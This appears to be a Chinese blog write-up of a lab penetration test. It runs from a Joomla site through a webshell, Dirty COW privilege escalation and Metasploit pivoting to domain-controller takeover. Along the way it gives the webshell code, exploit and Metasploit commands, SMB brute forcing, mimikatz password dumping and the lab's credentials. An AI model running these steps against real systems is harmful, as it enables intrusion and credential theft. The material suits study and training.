外网信息收集
http://10.203.87.242
CMS:Joomla
语言:PHP
web服务器:nginx 1.9.4
端口信息:
22端口开放 应该可以SSH登录
敏感目录扫描:
[16:57:11] 403 - 278B - /.htaccess.bak1
[16:57:11] 403 - 278B - /.htaccess.orig
[16:57:11] 403 - 278B - /.htaccess.sample
[16:57:11] 403 - 278B - /.htaccessBAK
[16:57:11] 403 - 278B - /.htaccess.save
[16:57:11] 403 - 278B - /.htaccessOLD
[16:57:11] 403 - 278B - /.htaccessOLD2
[16:57:11] 403 - 278B - /.htm
[16:57:11] 403 - 278B - /.html
[16:57:11] 403 - 278B - /.httr-oauth
[16:57:11] 403 - 278B - /.php
[16:57:12] 200 - 92KB - /1.php
[16:57:12] 200 - 0B - /2.php
[16:57:13] 200 - 18KB - /LICENSE.txt
[16:57:15] 301 - 322B - /administrator -> http://10.203.87.242/administrator/
[16:57:15] 403 - 278B - /administrator/.htaccess
[16:57:15] 301 - 327B - /administrator/logs -> http://10.203.87.242/administrator/logs/
[16:57:15] 200 - 5KB - /administrator/index.php
[16:57:15] 200 - 5KB - /administrator/
[16:57:16] 200 - 31B - /bin/
[16:57:16] 301 - 312B - /bin -> http://10.203.87.242/bin/
[16:57:16] 200 - 31B - /cache/
[16:57:16] 301 - 314B - /cache -> http://10.203.87.242/cache/
[16:57:16] 301 - 319B - /components -> http://10.203.87.242/components/
[16:57:17] 200 - 0B - /configuration.php
[16:57:17] 200 - 2KB - /configuration.php~
[16:57:18] 200 - 3KB - /htaccess.txt
[16:57:18] 200 - 31B - /images/
[16:57:18] 301 - 315B - /images -> http://10.203.87.242/images/
[16:57:18] 200 - 31B - /includes/
[16:57:18] 301 - 317B - /includes -> http://10.203.87.242/includes/
[16:57:18] 200 - 16KB - /index.php
[16:57:18] 200 - 9KB - /index.php/login/
[16:57:19] 301 - 317B - /language -> http://10.203.87.242/language/
[16:57:19] 301 - 318B - /libraries -> http://10.203.87.242/libraries/
[16:57:19] 301 - 314B - /media -> http://10.203.87.242/media/
[16:57:19] 301 - 316B - /modules -> http://10.203.87.242/modules/
[16:57:20] 301 - 316B - /plugins -> http://10.203.87.242/plugins/
[16:57:21] 200 - 829B - /robots.txt
[16:57:21] 403 - 278B - /server-status
[16:57:21] 403 - 278B - /server-status/
[16:57:22] 301 - 318B - /templates -> http://10.203.87.242/templates/
[16:57:22] 200 - 31B - /templates/
[16:57:22] 200 - 31B - /tmp/
[16:57:22] 301 - 312B - /tmp -> http://10.203.87.242/tmp/
[16:57:23] 200 - 2KB - /web.config.txt
后台登录地址:/administrator/index.php
前台登录地址:/index.php/login/
http://10.203.87.242/index.php/author-login
robots.txt
User-agent: *
Disallow: /administrator/
Disallow: /bin/
Disallow: /cache/
Disallow: /cli/
Disallow: /components/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /layouts/
Disallow: /libraries/
Disallow: /logs/
Disallow: /modules/
Disallow: /plugins/
Disallow: /tmp/
在http://10.203.87.242/configuration.php~
发现数据库的账号密码
分别为:testuser、cvcvgjASD!@
一般情况下是会默认自带README.txt这个文件里面会显示目前CMS版本为xxx,第三行表明目前版本是3.9
http://10.203.87.242/README.txt
利用kali自带的joomscan扫描
joomscan -u http://10.203.87.242
得到具体的版本以及一些关键信息
版本为3.9.12
利用sql注入漏洞不行
使用navicat连接数据库
得到管理员账户
username:administrator
emali:test@test.com
password:$2y
10
10
10YLDHAKavP1T0s.R4dTN3ZuEhtXaecvsoi02Vb37N8/zo/.MJ18seu
下了一些工具尝试进行解密
但是行不通
看了WP
知道了密码为testadmin
拿到后台shell
成功登录到后台
在Extensions->Templates->Templates
选择第一个
点击进入之后得到
发现存在可以编辑的php
向其中插入一句话木马
直接上马
在虚拟终端输入whoami
回显
查看phpinfo
http://10.203.87.242/1.php
发现ban了很多函数
没有ban掉phpenv
通过蚁剑的disable_function插件进行绕过
通过自己上传的马绕过生成的代理脚本不能用
只能通过网站的本目录下的2.php进行连接
生成代理脚本
/var/www/html/2.php
<?php @eval($_POST[pp]);?>
密码和原来一样
成功连接
进行信息收集
内网信息收集
存在192.168.93.120的内网IP
但是网络信息里没有10.203.87.242的信息
在/tmp/mysql/test.txt的文件中发现有用户信息
adduser wwwuser
passwd wwwuser_123Aqx
通过ssh进行登录
查看网络信息
发现内网网段地址,192.168.93.100
得到用户信息
firefart:fiAk2oSbNrAmM:0:0:pwned:/root:/bin/bash
/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
nginx:x:498:498:nginx user:/var/cache/nginx:/sbin/nologin
wwwuser:x:500:500::/home/wwwuser:/bin/bash
尝试第一个账户进行登录
friefart 但是密码怎么解密
放弃
通过蚁剑可以查看到系统的详细信息
系统信息: Linux ubuntu 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16
21:00:45 UTC 2019 x86_64
利用脏牛进行提权
根据版本信息
尝试利用脏牛提权
通过蚁剑将dirty.c上传到/var/tmp的文件夹下
gcc -pthreaddirty.c -odirty -lcrypt
./dirty 123456
默认生成账号为firefart
得到正常的回显
再开启一个ssh连接
使用账号
firefart
123456
成功进行登录
利用msf进行ssh登录
使用msf的ssh登录模块成功登录10.203.87.242
use auxiliary/scanner/ssh/ssh_login
show options
set RHOSTS 10.203.87.242
set USERNAME firefart
set PASSWORD 123456
exploit
攻击完成
查看会话列表
sessions -l
进入指定会话
sessions -i 1
因为账号密码全部正确
所以很轻松得到一个 linux shell,但是注意不是meterpreter shell
所以使用
sessions -u 1(sessions -u id)
将linux shell升级为meterpreter shell
测试成功
增加一个新的session
进入新的session里
终于又回到熟悉的地方
添加路由
接下来就是查看路由信息
run get_local_subnets
添加路由并设置socks5代理
meterpreter > run autoroute -s 192.168.93.0/24
meterpreter > run autoroute -p
meterpreter > background
msf5 exploit(multi/handler) > search socks5
msf5 exploit(multi/handler) > use 0
msf5 auxiliary(server/socks5) > options
msf5 auxiliary(server/socks5) > run
内网探测
使用proxychains进行扫描
探测内网的存活主机
proxychains nmap -Pn -sT -p 445,80,8080,3306,22,443 192.168.93.1-254
发现存活主机
并且对存活主机进行了全端口探测
速度太慢,后来改成了重要端口,80-3306
proxychains nmap -Pn -sT -p 1-65535 192.168.93.10
proxychains nmap -Pn -sT -p 1-65535 192.168.93.20
proxychains nmap -Pn -sT -p 1-65535 192.168.93.30
proxychains nmap -Pn -sT -p 1-65535 192.168.93.100
proxychains nmap -Pn -sT -p 1-65535 192.168.93.120
但是不能得到操作系统及版本
通过SMB协议进行探测
能够得到操作系统版本
msf5 auxiliary(server/socks5) > use auxiliary/scanner/smb/smb_version
msf5 auxiliary(scanner/smb/smb_version) > show options
msf5 auxiliary(scanner/smb/smb_version) > set rhosts 192.168.93.0/24
msf5 auxiliary(scanner/smb/smb_version) > set threads 30
msf5 auxiliary(scanner/smb/smb_version) > exploit
发现域控环境:TEST
总结内网信息:
继续渗透
需要对10、20、30继续进行利用
smb密码爆破并登录
通过smb_login模块进行密码爆破
得到账号密码为Administrator、123qwe!ASD
使用psexec模块成功上线shell
msf5 auxiliary(server/socks5) > use exploit/windows/smb/psexec
msf5 exploit(windows/smb/psexec) > set payload windows/meterpreter/bind_tcp
msf5 exploit(windows/smb/psexec) > show options
msf5 exploit(windows/smb/psexec) > set LPORT 2222
msf5 exploit(windows/smb/psexec) > set rhosts 192.168.93.20
msf5 exploit(windows/smb/psexec) > set smbuser Administrator
msf5 exploit(windows/smb/psexec) > set smbpass 123qwe!ASD
msf5 exploit(windows/smb/psexec) > run
成功得到192.168.93.20的meterpreter shell
域的探测
在meterpreter命令行下收集信息
进入shell
确定存在TEST的域环境
ipconfig
ping了一下域
ping test.org
确定了域控IP
为192.168.93.10
meterpreter > ps查看所有进程
注意:User为System的权限
meterpreter > getuid得到当前进程
meterpreter > migrate 3828
在这里就开始有问题了
因为我开始迁移的这个进程是3828
而这个进程的
user是NT AUTHORITY\LOCAL SERVICE
所以在迁移进程后,权限不是最高权限
所以在meterpreter命令行下
load mimikatz、kerberos抓取明文密码时始终权限不够
使用getsystem也都没有用
我们需要迁移到System的进程里
再次查看进程
特别注意找user为System的进程,还要找64的进程
选择了1984
meterpreter > migrate 1984
[*] Migrating from 3956 to 1984...
[*] Migration completed successfully.
meterpreter > load mimikatz
Loading extension mimikatz...[!] Loaded Mimikatz on a newer OS (Windows 2008 (6.0 Build 6003, Service Pack 2).). Did you mean to 'load kiwi' instead?
Success.
meterpreter > kerberos
load mimikatz:加载猕猴桃模块
msv:获取登录密码的hash
kerberos:获取明文密码
成功抓取到明文密码
账号:Administrator
密码:zxcASDqw123!!
拿下域控
期间尝试了打开192.168.93.20的3389端口
想通过远程桌面登录域控账号
proxychains rdesktop 192.168.93.20
端口和远程桌面是成功打开了
但是不能登录域控账号
还是得用IPC
进入shell命令行
通过20建立与10的通道
得到敏感文件
什么是IPC$:
是共享“命名管道”的资源,它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。
总结:
1、joomlaCMS
2、迁移进程
3、IPC
参考链接:
https://www.eee-eee.com/blog-news/89-joomla/1124-%E5%A6%82%E6%9E%9C%E9%81%97%E5%BF%98joomla%E5%AF%86%E7%A0%81%E5%A6%82%E4%BD%95%E9%80%9A%E8%BF%87%E6%95%B0%E6%8D%AE%E5%BA%93%E9%87%8D%E7%BD%AEjoomla%E5%AF%86%E7%A0%81.html
https://www.cnblogs.com/sch01ar/p/8590641.html
https://blog.csdn.net/h4ck0ne/article/details/50570767
https://www.jianshu.com/p/d5806a003205?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation
https://blog.csdn.net/henni_719/article/details/88916095
https://www.cnblogs.com/bestitj/p/12811743.html
https://blog.csdn.net/weixin_45677119/article/details/110941766
https://www.cnblogs.com/Hi-blog/p/How-To-Detect-Alive-Host.html
https://www.cnblogs.com/linlei1234/p/9965012.html
扫一扫
264
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
